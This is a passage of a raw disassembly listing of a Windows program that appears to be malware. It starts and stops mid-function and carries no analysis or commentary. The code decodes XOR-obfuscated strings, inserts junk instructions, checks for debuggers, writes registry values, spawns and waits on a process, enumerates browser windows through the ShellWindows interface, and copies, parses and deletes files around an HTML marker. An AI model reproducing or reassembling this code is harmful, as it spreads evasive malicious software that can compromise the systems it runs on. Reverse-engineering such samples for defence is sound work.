call sub_40C3BC ; lstrlenA
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_3001C]
call sub_40C3B0 ; WriteFile
lea edi, [ebp+var_3007C]
lea esi, aTcurf ; "TcUrf"
mov ecx, 3
rep movsw
push [ebp+var_3001C]
call sub_40C1DC ; CloseHandle
push [ebp+var_20008]
call sub_40C2D8 ; LocalFree
cmp [ebp+var_30018], 0
jnz short loc_406071
push ebx
call sub_40C2D8 ; LocalFree
jmp short loc_406076
; ---------------------------------------------------------------------------
loc_406071: ; CODE XREF: sub_4056EE+979�j
or eax, 0FFFFFFFFh
jmp short loc_40607C
; ---------------------------------------------------------------------------
loc_406076: ; CODE XREF: sub_4056EE+981�j
mov eax, [ebp+var_30014]
loc_40607C: ; CODE XREF: sub_4056EE+986�j
pop edi
pop esi
pop ebx
leave
retn
sub_4056EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406081 proc near ; CODE XREF: sub_4063A9:loc_40649D�p
var_2120 = byte ptr -2120h
var_211F = byte ptr -211Fh
var_2118 = byte ptr -2118h
var_1119 = byte ptr -1119h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2120h
call sub_40C118
push ebx
push esi
push edi
mov ebx, 6603h
inc ebx
mov ebx, 6AC5h
mov eax, ebx
add eax, ebx
mov ebx, eax
mov eax, dword_4412F8
mov [ebp+var_10C], eax
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_4061EB
; ---------------------------------------------------------------------------
loc_4060C0: ; CODE XREF: sub_406081+172�j
mov byte ptr [ebp+var_118+3], 22h
movzx eax, byte ptr [ebp+var_118+3]
imul eax, 51BCh
mov byte ptr [ebp+var_118+3], al
push 44h
push offset byte_446127
call sub_4052CE
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40C6B0
lea edi, [ebp+var_11C+1]
lea esi, aPxpwz ; "pxPwz"
mov ecx, 3
rep movsw
push 4
push offset aCscc ; "–‘—–"
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015C0
call sub_40C1F4 ; GetProcessHeap
push 4
push offset aCscc ; "–‘—–"
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015C0
push 4Dh
push offset dword_4460D4
call sub_4052CE
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40C6B0
push 4
push offset aCscc ; "–‘—–"
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015C0
call sub_40C188 ; GetCurrentProcessId
push 4
push offset aCscc ; "–‘—–"
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015C0
add esp, 0A8h
add [ebp+var_101], 1
loc_4061EB: ; CODE XREF: sub_406081+3A�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_4060C0
call sub_40C224 ; GetVersion
cmp eax, 80000000h
jb short loc_406267
call sub_40C224 ; GetVersion
push 4Ch
push offset byte_446087
call sub_4052CE
mov [ebp+var_118], eax
push 10h
push offset word_446076
call sub_4052CE
mov [ebp+var_11C], eax
push 3
push offset word_446072
call sub_4052CE
push 1
mov edi, dword_44128C
add edi, 2
push edi
push eax
mov edi, [ebp+var_11C]
push edi
mov edi, [ebp+var_118]
push edi
push 80000003h
call sub_4015C0
add esp, 30h
jmp loc_406301
; ---------------------------------------------------------------------------
loc_406267: ; CODE XREF: sub_406081+182�j
mov ax, word_441302
mov word ptr [ebp+var_11C+2], ax
lea edi, [ebp+var_211F]
lea esi, a4VVx ; "4:V<vX"
mov ecx, 7
rep movsb
lea eax, [ebp+var_1119]
push eax
call sub_405217
call sub_40C2B4 ; IsDebuggerPresent
push 59h
push offset dword_446018
call sub_4052CE
lea edi, [ebp+var_1119]
push edi
push eax
lea edi, [ebp+var_2118]
push edi
call sub_40C6B0
call sub_40C188 ; GetCurrentProcessId
and [ebp+var_118], 0
push 0Ch
push offset aI_0 ; "ÎÂß×ËÈÕ‰ÂßÂ"
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_118]
push edi
push eax
lea edi, [ebp+var_2118]
push edi
push 80000003h
call sub_4015C0
add esp, 38h
lea edi, [ebp+var_2120]
lea esi, byte_44130B
xor ecx, ecx
inc ecx
rep movsb
loc_406301: ; CODE XREF: sub_406081+1E1�j
push 3Bh
push offset byte_445FCF
call sub_4052CE
mov [ebp+var_118], eax
push 11h
push offset byte_445FBD
call sub_4052CE
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
mov edi, [ebp+var_118]
push edi
push 80000001h
call sub_4015C0
mov eax, dword_44130C
mov [ebp+var_110], eax
push 33h
push offset byte_445F89
call sub_4052CE
push 1
push 0
push offset byte_446481
push offset byte_446481
push eax
push 80000001h
call sub_4015C0
mov eax, dword_441310
mov [ebp+var_114], eax
push 3Bh
push offset byte_445F4D
call sub_4052CE
push 1
push 0
push offset byte_446481
push offset byte_446481
push eax
push 80000001h
call sub_4015C0
add esp, 68h
call sub_40C1F4 ; GetProcessHeap
pop edi
pop esi
pop ebx
leave
retn
sub_406081 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063A9 proc near ; CODE XREF: sub_4096E4+270�p
; sub_4096E4+549�p ...
var_3AA = word ptr -3AAh
var_3A8 = dword ptr -3A8h
var_3A1 = byte ptr -3A1h
var_29D = byte ptr -29Dh
var_29A = word ptr -29Ah
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_28D = byte ptr -28Dh
var_288 = byte ptr -288h
var_283 = byte ptr -283h
var_27D = byte ptr -27Dh
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_265 = byte ptr -265h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3ACh
push ebx
push esi
push edi
call sub_40C224 ; GetVersion
and [ebp+var_14C], 0
xor ebx, ebx
lea edi, [ebp+var_27D]
lea esi, aGf ; "+GF "
mov ecx, 5
rep movsb
push offset dword_441298
call sub_40C290 ; InterlockedIncrement
mov [ebp+var_26C], eax
lea edi, [ebp+var_283]
lea esi, aHv1xj ; "hV1xJ"
mov ecx, 3
rep movsw
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40C680
call sub_40C1B8 ; RtlGetLastWin32Error
mov [ebp+var_270], 104h
call sub_40C1B8 ; RtlGetLastWin32Error
push 21h
push offset byte_445F2B
call sub_4052CE
mov [ebp+var_294], eax
push 4
push offset word_445F26
call sub_4052CE
lea edi, [ebp+var_288]
push edi
lea edi, [ebp+var_270]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_294]
push edi
push 80000002h
call sub_4014AA
add esp, 34h
mov [ebp+var_274], eax
mov [ebp+var_264], 3641h
inc [ebp+var_264]
or eax, eax
jnz short loc_40649D
mov byte ptr [ebp+var_298+3], 84h
add byte ptr [ebp+var_298+3], 0CDh
push [ebp+arg_0]
call sub_40C2D8 ; LocalFree
xor eax, eax
jmp loc_4068D7
; ---------------------------------------------------------------------------
loc_40649D: ; CODE XREF: sub_4063A9+D5�j
call sub_406081
call sub_40C218 ; GetTickCount
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C170 ; ExpandEnvironmentStringsA
push [ebp+var_26C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_4056EE
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_40650A
cmp eax, 0FFFFFFFFh
jz short loc_406504
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_40650A
; ---------------------------------------------------------------------------
loc_406504: ; CODE XREF: sub_4063A9+14C�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_40650A: ; CODE XREF: sub_4063A9+147�j
; sub_4063A9+159�j
cmp [ebp+var_14C], 0
jnz short loc_406541
mov [ebp+var_298], 3EB8h
mov eax, [ebp+var_298]
mov edx, eax
add edx, eax
mov [ebp+var_298], edx
push [ebp+arg_0]
call sub_40C2D8 ; LocalFree
call sub_40C218 ; GetTickCount
xor eax, eax
jmp loc_4068D7
; ---------------------------------------------------------------------------
loc_406541: ; CODE XREF: sub_4063A9+168�j
push 0Eh
push offset byte_445F17
call sub_4052CE
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C6D4
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40C6D4
call sub_40C2B4 ; IsDebuggerPresent
call sub_404602
mov [ebp+var_278], eax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40C680
lea edi, [ebp+var_28D]
lea esi, a6djg ; "6DJg"
mov ecx, 5
rep movsb
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40C680
add esp, 30h
call sub_40C1B8 ; RtlGetLastWin32Error
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_278], 0
jz short loc_4065F2
lea eax, [ebp+var_148]
push eax
call sub_4046BD
pop ecx
jmp short loc_4065FB
; ---------------------------------------------------------------------------
loc_4065F2: ; CODE XREF: sub_4063A9+238�j
mov [ebp+var_118], 0
loc_4065FB: ; CODE XREF: sub_4063A9+247�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40C38C ; CreateProcessA
or eax, eax
jz loc_40687C
call sub_40C1F4 ; GetProcessHeap
push [ebp+var_25C]
call sub_40C1DC ; CloseHandle
call sub_40C1B8 ; RtlGetLastWin32Error
push 22h
push offset aVVZkzZuZt ; "‚Ô‚Ò‡Š‡êÎÄÕÈÔÈÁÓ‡îÉÓÂÕÉÂÓ‡âß×ËÈÕÂÕ"
call sub_4052CE
push [ebp+var_26C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C6B0
add esp, 18h
mov word ptr [ebp+var_298], 1C85h
movzx eax, word ptr [ebp+var_298]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_298], ax
mov byte ptr [ebp+var_298+3], 0
jmp short loc_4066D5
; ---------------------------------------------------------------------------
loc_40668D: ; CODE XREF: sub_4063A9+334�j
call sub_40C2B4 ; IsDebuggerPresent
push 7
push offset aUts ; "îâáÕÆÊÂ"
call sub_4052CE
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40C404 ; FindWindowA
mov ebx, eax
call sub_40C224 ; GetVersion
or ebx, ebx
jnz short loc_4066DF
call sub_40C2B4 ; IsDebuggerPresent
mov eax, dword_44128C
add eax, 3E6h
push eax
call sub_40C350 ; Sleep
add byte ptr [ebp+var_298+3], 1
loc_4066D5: ; CODE XREF: sub_4063A9+2E2�j
mov al, byte ptr [ebp+var_298+3]
cmp al, 0Ah
jb short loc_40668D
loc_4066DF: ; CODE XREF: sub_4063A9+30E�j
or ebx, ebx
jz loc_40686E
call sub_40C224 ; GetVersion
push 0F000h
call sub_40C350 ; Sleep
call sub_40C2B4 ; IsDebuggerPresent
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40C3EC ; GetWindowTextA
mov eax, 0Bh
sub eax, dword_441290
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_40181E
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_406860
call sub_40C194 ; GetCurrentThreadId
lea edi, [ebp+var_29D]
lea esi, asc_441324 ; "&X"
mov ecx, 3
rep movsb
mov [ebp+var_29A], 63F1h
movzx eax, [ebp+var_29A]
imul eax, 2B65h
mov [ebp+var_29A], ax
lea eax, [ebp+var_3A1]
push eax
push [ebp+arg_4]
call sub_405409
add esp, 8
or eax, eax
jz loc_40684F
mov ax, word_441327
mov [ebp+var_3AA], ax
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3A1]
push eax
call sub_40C284 ; CopyFileA
call sub_40C1F4 ; GetProcessHeap
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401AC1
mov [ebp+var_3A8], eax
call sub_40C1F4 ; GetProcessHeap
push [ebp+arg_8]
call sub_40C3E0 ; DeleteFileA
call sub_40C188 ; GetCurrentProcessId
push offset aHtml ; "<HTML><!--"
call sub_40C3BC ; lstrlenA
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3A8]
call sub_40C6EC
add esp, 14h
or eax, eax
jnz short loc_40681D
push offset aHtml ; "<HTML><!--"
call sub_40C3BC ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3A8]
push edi
push [ebp+arg_8]
call sub_405368
add esp, 0Ch
jmp short loc_406838
; ---------------------------------------------------------------------------
loc_40681D: ; CODE XREF: sub_4063A9+448�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3A8]
push [ebp+arg_8]
call sub_405368
add esp, 0Ch
loc_406838: ; CODE XREF: sub_4063A9+472�j
push [ebp+var_3A8]
call sub_40C2D8 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_406888
; ---------------------------------------------------------------------------
loc_40684F: ; CODE XREF: sub_4063A9+3D8�j
call sub_40C1F4 ; GetProcessHeap
mov [ebp+var_14C], 1
jmp short loc_406888
; ---------------------------------------------------------------------------
loc_406860: ; CODE XREF: sub_4063A9+389�j
call sub_40C194 ; GetCurrentThreadId
and [ebp+var_14C], 0
jmp short loc_406888
; ---------------------------------------------------------------------------
loc_40686E: ; CODE XREF: sub_4063A9+338�j
call sub_40C224 ; GetVersion
and [ebp+var_14C], 0
jmp short loc_406888
; ---------------------------------------------------------------------------
loc_40687C: ; CODE XREF: sub_4063A9+27C�j
call sub_40C2B4 ; IsDebuggerPresent
and [ebp+var_14C], 0
loc_406888: ; CODE XREF: sub_4063A9+4A4�j
; sub_4063A9+4B5�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C3E0 ; DeleteFileA
call sub_40C188 ; GetCurrentProcessId
push [ebp+arg_0]
call sub_40C2D8 ; LocalFree
mov [ebp+var_265], 0D3h
add [ebp+var_265], 1
push 0
push [ebp+var_260]
call sub_40C35C ; TerminateProcess
call sub_40C224 ; GetVersion
push [ebp+var_260]
call sub_40C1DC ; CloseHandle
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, [ebp+var_14C]
loc_4068D7: ; CODE XREF: sub_4063A9+EF�j
; sub_4063A9+193�j
pop edi
pop esi
pop ebx
leave
retn
sub_4063A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068DC proc near ; CODE XREF: sub_406B40+9C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441334
lea eax, ds:41B7E0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov [ebp+var_4], 338h
xor edi, edi
jmp short loc_406921
; ---------------------------------------------------------------------------
loc_40690A: ; CODE XREF: sub_4068DC+47�j
mov eax, dword_441334
add eax, edi
lea eax, ds:41B7E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 49h
mov [eax], dl
inc edi
loc_406921: ; CODE XREF: sub_4068DC+2C�j
cmp edi, esi
jl short loc_40690A
mov [ebp+var_8], 339h
mov eax, dword_441334
add eax, esi
mov byte ptr ds:dword_41B7E0[eax], 0
xor edi, edi
mov edi, dword_441334
mov eax, edi
lea eax, [eax+esi+6]
mov dword_441334, eax
cmp eax, 0DD4h
jle short loc_40695C
and dword_441334, 0
loc_40695C: ; CODE XREF: sub_4068DC+77�j
lea eax, dword_41B7E0[edi]
pop edi
pop esi
leave
retn
sub_4068DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406966 proc near ; CODE XREF: sub_406E3F+181�p
; sub_406E3F+556�p ...
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea edi, [ebp+var_8]
lea esi, aK3s ; "k-#3S "
mov ecx, 7
rep movsb
push [ebp+arg_0]
call sub_40C3C8 ; lstrlenW
mov ebx, eax
lea edi, [ebp+var_F]
lea esi, aOdvgM ; "ODvG-M"
mov ecx, 7
rep movsb
push 0
push 0
push 1FFFh
push [ebp+arg_4]
push ebx
push [ebp+arg_0]
push 0
push 0
call sub_40C398 ; WideCharToMultiByte
mov [ebp+var_1], 59h
sub [ebp+var_1], 0F4h
mov eax, [ebp+arg_4]
mov byte ptr [eax+ebx], 0
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_406966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069C8 proc near ; CODE XREF: sub_406A44+E1�p
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C1F4 ; GetProcessHeap
cmp dword_44133C, 0
jz short loc_4069ED
mov eax, dword_44133C
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4069ED: ; CODE XREF: sub_4069C8+18�j
mov [ebp+var_2], 7AC0h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
mov eax, [ebx+4]
push dword ptr [ebx+4]
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_3], 27h
sub [ebp+var_3], 0CBh
mov eax, [ebx]
push dword ptr [ebx]
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_6], 57B4h
add [ebp+var_6], 0E1Ah
call sub_40B6D4
lea edi, [ebp+var_C]
lea esi, aESk ; "E`Sk "
mov ecx, 3
rep movsw
pop edi
pop esi
pop ebx
leave
retn
sub_4069C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A44 proc near ; CODE XREF: sub_406E3F+41�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_26 = byte ptr -26h
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_5], 0BDh
movzx eax, [ebp+var_5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5], al
lea edi, [ebp+var_26]
lea esi, asc_441358 ; " + '<"
mov ecx, 3
rep movsw
and dword ptr [ebx], 0
and dword ptr [ebx+4], 0
push 0
call sub_40B6C8
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_20]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40B6BC
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_30], eax
or eax, eax
jnz short loc_406B24
call sub_40C2B4 ; IsDebuggerPresent
push ebx
push offset dword_446A54
push 4
push 0
lea eax, [ebp+var_20]
push eax
call sub_40B6B0
mov [ebp+var_4], eax
lea edi, [ebp+var_2B]
lea esi, aVifa ; "ViFA"
mov ecx, 5
rep movsb
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_34], eax
or eax, eax
jnz short loc_406B24
mov [ebp+var_C], 548Ch
sub [ebp+var_C], 6CA6h
mov eax, ebx
add eax, 4
push eax
push offset dword_446A44
mov eax, [ebx]
push dword ptr [ebx]
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_38], eax
or eax, eax
jnz short loc_406B24
call sub_40C2B4 ; IsDebuggerPresent
xor eax, eax
inc eax
jmp short loc_406B3B
; ---------------------------------------------------------------------------
loc_406B24: ; CODE XREF: sub_406A44+60�j
; sub_406A44+9B�j ...
push ebx
call sub_4069C8
pop ecx
mov [ebp+var_10], 453Ah
sub [ebp+var_10], 300Dh
xor eax, eax
loc_406B3B: ; CODE XREF: sub_406A44+DE�j
pop edi
pop esi
pop ebx
leave
retn
sub_406A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B40 proc near ; CODE XREF: sub_406E3F+A3�p
var_10035 = byte ptr -10035h
var_10034 = word ptr -10034h
var_10032 = byte ptr -10032h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10023 = byte ptr -10023h
var_24 = word ptr -24h
var_21 = byte ptr -21h
var_20 = word ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10038h
call sub_40C118
push ebx
push esi
push edi
call sub_40C1B8 ; RtlGetLastWin32Error
cmp dword_441340, 0FFFFh
jz short loc_406B68
and dword_441338, 0
loc_406B68: ; CODE XREF: sub_406B40+1F�j
mov [ebp+var_C], 2E9Fh
add [ebp+var_C], 5477h
mov eax, dword_441338
cmp [ebp+arg_4], eax
jz loc_406DAF
mov eax, [ebp+arg_4]
mov dword_441338, eax
cmp dword_44133C, 0
jz short loc_406BB1
call sub_40C194 ; GetCurrentThreadId
mov eax, dword_44133C
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C188 ; GetCurrentProcessId
and dword_44133C, 0
loc_406BB1: ; CODE XREF: sub_406B40+53�j
mov eax, dword_441363
mov [ebp+var_1002C], eax
push 0FFFFh
lea eax, [ebp+var_10023]
push eax
push [ebp+arg_4]
call sub_40C3EC ; GetWindowTextA
call sub_40C224 ; GetVersion
push 1Bh
push offset dword_445E6C
call sub_4068DC
mov edi, 11h
sub edi, dword_441330
push edi
push eax
lea edi, [ebp+var_10023]
push edi
call sub_40181E
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406C3B
mov [ebp+var_10034], 11FFh
movzx eax, [ebp+var_10034]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_10034], ax
and dword_44133C, 0
mov [ebp+var_10035], 6Ch
add [ebp+var_10035], 0C8h
jmp loc_406DAF
; ---------------------------------------------------------------------------
loc_406C3B: ; CODE XREF: sub_406B40+C2�j
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
call sub_40C1B8 ; RtlGetLastWin32Error
cmp [ebp+var_8], 0
jz loc_406DAF
call sub_40C2B4 ; IsDebuggerPresent
or ebx, ebx
jnz loc_406DAF
call sub_40C188 ; GetCurrentProcessId
and [ebp+var_4], 0
cmp dword_441340, 0FFFFh
jz short loc_406CB7
call sub_40C194 ; GetCurrentThreadId
inc dword_441340
mov eax, [ebp+var_8]
cmp dword_441340, eax
jbe short loc_406C9B
and dword_441340, 0
loc_406C9B: ; CODE XREF: sub_406B40+152�j
mov dword ptr [ebp-10038h], 65A5h
sub dword ptr [ebp-10038h], 74CEh
mov eax, dword_441340
mov [ebp+var_4], eax
loc_406CB7: ; CODE XREF: sub_406B40+13C�j
; sub_406B40+262�j
push 0
call sub_40C638
pop ecx
lea edi, [ebp+var_10032]
lea esi, aMVaj ; "M ‚€J"
mov ecx, 3
rep movsw
mov [ebp+var_20], 2
mov eax, [ebp+var_4]
mov [ebp+var_18], eax
mov dword_441340, eax
lea eax, [ebp+var_10]
push eax
lea esi, [ebp+var_20]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_406D80
call sub_40C1F4 ; GetProcessHeap
push offset dword_44133C
push offset dword_446A64
mov eax, [ebp+var_10]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C194 ; GetCurrentThreadId
or ebx, ebx
jnz short loc_406D80
lea eax, [ebp+var_10028]
push eax
mov eax, dword_44133C
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
call sub_40C194 ; GetCurrentThreadId
or ebx, ebx
jnz short loc_406D80
mov [ebp+var_21], 0AEh
movzx eax, [ebp+var_21]
imul eax, 4F3Fh
mov [ebp+var_21], al
mov dword_441340, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_10028], eax
jz short loc_406DAF
mov [ebp+var_24], 1316h
inc [ebp+var_24]
loc_406D80: ; CODE XREF: sub_406B40+1C7�j
; sub_406B40+1EE�j ...
cmp dword_44133C, 0
jz short loc_406D94
mov eax, dword_44133C
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406D94: ; CODE XREF: sub_406B40+247�j
call sub_40C224 ; GetVersion
inc [ebp+var_4]
mov eax, [ebp+var_8]
cmp [ebp+var_4], eax
jb loc_406CB7
and dword_44133C, 0
loc_406DAF: ; CODE XREF: sub_406B40+3E�j
; sub_406B40+F6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406DB4 proc near ; CODE XREF: sub_406E3F+5F5�p
; sub_406E3F+646�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441378
lea eax, ds:430DE0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov [ebp+var_4], 17Fh
xor edi, edi
jmp short loc_406DF8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406DB4+46�j
mov eax, dword_441378
add eax, edi
lea eax, ds:430DE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Ch
mov [eax], dl
inc edi
loc_406DF8: ; CODE XREF: sub_406DB4+2B�j
cmp edi, esi
jl short loc_406DE1
mov eax, dword_441378
add eax, esi
mov byte ptr ds:dword_430DE0[eax], 0
mov edi, dword_441378
add dword_441378, 3
mov eax, dword_441378
add eax, 6
add eax, esi
mov dword_441378, eax
cmp eax, 0DCDh
jle short loc_406E35
and dword_441378, 0
loc_406E35: ; CODE XREF: sub_406DB4+78�j
lea eax, dword_430DE0[edi]
pop edi
pop esi
leave
retn
sub_406DB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E3F proc near ; CODE XREF: sub_407F91+62�p
var_63870 = dword ptr -63870h
var_6386A = byte ptr -6386Ah
var_63869 = byte ptr -63869h
var_63864 = dword ptr -63864h
var_63860 = dword ptr -63860h
var_6385A = byte ptr -6385Ah
var_6285B = byte ptr -6285Bh
var_62854 = dword ptr -62854h
var_6284D = byte ptr -6284Dh
var_6284C = word ptr -6284Ch
var_6284A = word ptr -6284Ah
var_62848 = dword ptr -62848h
var_62842 = word ptr -62842h
var_62840 = dword ptr -62840h
var_6283B = byte ptr -6283Bh
var_6283A = word ptr -6283Ah
var_62838 = word ptr -62838h
var_62830 = dword ptr -62830h
var_62828 = word ptr -62828h
var_62820 = dword ptr -62820h
var_6281A = byte ptr -6281Ah
var_62818 = dword ptr -62818h
var_62814 = dword ptr -62814h
var_62810 = dword ptr -62810h
var_6280C = dword ptr -6280Ch
var_62807 = byte ptr -62807h
var_62806 = word ptr -62806h
var_62804 = dword ptr -62804h
var_62800 = byte ptr -62800h
var_627F9 = byte ptr -627F9h
var_627F1 = byte ptr -627F1h
var_627EA = dword ptr -627EAh
var_627E6 = byte ptr -627E6h
var_627DE = word ptr -627DEh
var_627DC = dword ptr -627DCh
var_627D6 = word ptr -627D6h
var_627D4 = word ptr -627D4h
var_627D1 = byte ptr -627D1h
var_627D0 = dword ptr -627D0h
var_627CC = dword ptr -627CCh
var_627C7 = byte ptr -627C7h
var_626C8 = dword ptr -626C8h
var_626C4 = dword ptr -626C4h
var_626C0 = word ptr -626C0h
var_626B8 = dword ptr -626B8h
var_626AC = dword ptr -626ACh
var_626A8 = dword ptr -626A8h
var_626A4 = dword ptr -626A4h
var_626A0 = dword ptr -626A0h
var_6269C = dword ptr -6269Ch
